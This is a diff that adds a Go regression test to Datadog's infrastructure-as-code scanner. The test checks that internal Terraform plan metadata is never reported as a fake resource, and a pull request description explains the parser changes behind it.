+++ b/pkg/runner/tfplan_meta_isolation_test.go
@@ -1,0 +1,168 @@
+/*
+ * Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
+ *
+ * This product includes software developed at Datadog (https://www.datadoghq.com)  Copyright 2024 Datadog, Inc.
+ */
+package runner
+
+import (
+	"context"
+	"testing"
+
+	"github.com/DataDog/datadog-iac-scanner/internal/tracker"
+	"github.com/DataDog/datadog-iac-scanner/pkg/engine"
+	"github.com/DataDog/datadog-iac-scanner/pkg/engine/source"
+	"github.com/DataDog/datadog-iac-scanner/pkg/featureflags"
+	"github.com/DataDog/datadog-iac-scanner/pkg/model"
+	jsonParser "github.com/DataDog/datadog-iac-scanner/pkg/parser/json"
+	"github.com/DataDog/datadog-iac-scanner/pkg/utils"
+	"github.com/DataDog/datadog-iac-scanner/pkg/vfs"
+	"github.com/google/uuid"
+	"github.com/stretchr/testify/require"
+)
+
+// stubQueriesSource is a minimal in-memory source.QueriesSource for driving
+// engine.NewInspector with a single ad-hoc rule.
+type stubQueriesSource struct {
+	queries []model.QueryMetadata
+}
+
+func (s *stubQueriesSource) GetQueries(_ context.Context, _ *source.QueryInspectorParameters) ([]model.QueryMetadata, error) {
+	return s.queries, nil
+}
+
+func (s *stubQueriesSource) GetQueryLibrary(_ context.Context, platform string) (source.RegoLibraries, error) {
+	return source.RegoLibraries{
+		LibraryCode:      "package generic." + platform + "\n",
+		LibraryInputData: "{}",
+	}, nil
+}
+
+// cloudwatchLogMetricFilterRule mirrors the common pattern of iterating
+// doc.resource.<type> directly, which would pick up a reserved key as a fake resource.
+const cloudwatchLogMetricFilterRule = `package datadog
+
+DatadogPolicy contains result if {
+	some resourceName, resource in input.document[0].resource.aws_cloudwatch_log_metric_filter
+
+	result := {
+		"documentId": input.document[0].id,
+		"resourceType": "aws_cloudwatch_log_metric_filter",
+		"resourceName": resourceName,
+		"searchKey": sprintf("aws_cloudwatch_log_metric_filter[%s]", [resourceName]),
+	}
+}
+`
+
+// TestInspect_TFPlanMetaNotExposedAsFakeResource is a regression test:
+// _dd_tfplan_meta must never surface as a fake resource to Rego rules.
+func TestInspect_TFPlanMetaNotExposedAsFakeResource(t *testing.T) {
+	ctx := context.Background()
+
+	planJSON := []byte(`{
+		"format_version": "1.2",
+		"terraform_version": "1.5.0",
+		"planned_values": {
+			"root_module": {
+				"resources": [
+					{
+						"address": "aws_cloudwatch_log_metric_filter.errors",
+						"mode": "managed",
+						"type": "aws_cloudwatch_log_metric_filter",
+						"name": "errors",
+						"values": {
+							"name": "errors",
+							"pattern": "ERROR"
+						}
+					}
+				]
+			}
+		},
+		"resource_changes": [
+			{
+				"address": "aws_cloudwatch_log_metric_filter.errors",
+				"change": {
+					"after_unknown": {"id": true}
+				}
+			}
+		],
+		"configuration": {
+			"root_module": {
+				"resources": [
+					{
+						"address": "aws_cloudwatch_log_metric_filter.errors",
+						"expressions": {
+							"pattern": {"constant_value": "ERROR"}
+						}
+					}
+				]
+			}
+		}
+	}`)
+
+	p := &jsonParser.Parser{}
+	_, docs, _, _, err := p.Parse(ctx, planJSON, "tfplan.json", false, 15)
+	require.NoError(t, err)
+	require.Len(t, docs, 1)
+
+	kind, ok := p.KindForContent(planJSON)
+	require.True(t, ok)
+	require.Equal(t, model.KindTerraformPlan, kind)
+
+	prepared := PrepareScanDocument(ctx, docs[0], kind)
+	require.Contains(t, prepared, "_dd_tfplan_meta",
+		"sanity check: the document must actually carry _dd_tfplan_meta for this test to be meaningful")
+
+	doc := model.FileMetadata{
+		ID:                uuid.NewString(),
+		ScanID:            "test",
+		Document:          prepared,
+		LineInfoDocument:  prepared,
+		Kind:              model.KindTerraformPlan,
+		FilePath:          "tfplan.json",
+		OriginalData:      string(planJSON),
+		LinesOriginalData: utils.SplitLines(string(planJSON)),
+	}
+
+	queries := []model.QueryMetadata{{
+		Query:       "cloudwatch_log_metric_filter_rule",
+		Content:     cloudwatchLogMetricFilterRule,
+		InputData:   "{}",
+		Platform:    "terraform",
+		Metadata:    map[string]any{"id": "cloudwatch-log-metric-filter-rule"},
+		Aggregation: 1,
+	}}
+
+	trk, err := tracker.NewTracker(3)
+	require.NoError(t, err)
+
+	ins, err := engine.NewInspector(
+		ctx,
+		&stubQueriesSource{queries: queries},
+		engine.DefaultVulnerabilityBuilder,
+		trk,
+		&source.QueryInspectorParameters{},
+		nil,
+		".",
+		false,
+		false,
+		1,
+		featureflags.NewLocalEvaluator(),
+		vfs.DiskFS{},
+		false,
+		false,
+	)
+	require.NoError(t, err)
+
+	vulns, err := ins.Inspect(ctx, "test", model.FileMetadatas{&doc}, []string{"terraform"})
+	require.NoError(t, err)
+	require.Empty(t, ins.GetFailedQueries(), "no query should fail")
+
+	require.Len(t, vulns, 1, "expected exactly one finding, for the real resource")
+	require.Equal(t, "errors", vulns[0].ResourceName)
+
+	for _, v := range vulns {
+		require.NotEqual(t, "_dd_tfplan_meta", v.ResourceName,
+			"_dd_tfplan_meta must never be reported as a resource")
+	}
+}


### PR DESCRIPTION
## Summary
- Correlates `resource_changes`/`configuration.root_module` into `_dd_tfplan_meta` for tfplan.json documents. `references`/`constant_value`/every other field a Rego rule already reads is never modified, at any module-call depth.
- When a `var.<name>` reference matches a call argument, a `call_site_expressions` sidecar is attached listing the raw, unevaluated expression at every hop up to the root (outermost first), deduplicated by `(module, argument)` identity. This never asserts an evaluated value or splices a reference into a resource's own `references` array: Terraform's plan JSON emits the identical `{"references": ["var.x"]}` shape for a bare `var.x`, `base64encode(var.x)`, `sha256(var.x)`, and string interpolation alike (verified against a real `terraform show -json` plan), so only the caller's raw expression is exposed, for a rule to interpret itself.
- Wires `TFPLAN`'s `pattern` attribute through `resolveJSONFilter` (matching existing HCL/`.tf` behavior), scoped to the top-level `resource` subtree so `resource_changes`/`configuration`/`_dd_tfplan_meta` stay byte-identical to the raw plan.

## Changes
- `pkg/parser/json/tfplan.go`: adds `_dd_tfplan_meta` (address-keyed correlation of `resource_changes`/`configuration` per resource, with a `call_site_expressions` provenance sidecar for module-call variable references, deduplicated by call-site identity to keep it linear in the number of call sites); passes `resource_changes`/`configuration` through into the parsed document unmodified.
- `pkg/runner/sink.go`: adds `"TFPLAN": {"pattern"}` to the JSON-filter-resolution table, matching existing `.tf`/HCL behavior for `aws_cloudwatch_log_metric_filter`-style `pattern` attributes.
- `pkg/runner/service.go`: scopes that filter resolution to the top-level `resource` subtree of a Terraform-plan document only, so `resource_changes`/`configuration`/`_dd_tfplan_meta` stay byte-identical to the raw plan. Verified behavior-identical to `main` for every non-`TFPLAN` kind (`.tf`, JSON, YAML) via a differential test.
- Test-only: `pkg/parser/json/tfplan_test.go`, `pkg/runner/sink_test.go`, `pkg/runner/tfplan_meta_isolation_test.go`.

## Blast Radius
Terraform plan JSON only — other platforms and file types unaffected. Additive fields only.

## Test plan
- [x] `go build ./...`, `go vet ./...`
- [x] `go test ./...` (pre-existing/unrelated e2e failures only, same baseline as `main`)
- [x] `golangci-lint run ./pkg/parser/json/...`
- [x] Fixtures covering: a constant call argument, a resource-reference call argument, an object-variable field read left unresolved (Terraform emits both a traversal and every prefix of it in one `references` array), a multi-reference expression with only one `var.*` entry, a two-level module chain (same and different argument names at each hop), a regression fixture generated from a real Terraform plan proving a direct/wrapped/interpolated reference to the same variable serialize identically and are never asserted equivalent, and a branching-module regression test asserting `call_site_expressions` grows linearly with depth rather than exponentially (was 1,048,574 entries at depth 18 before deduplication, now 38)
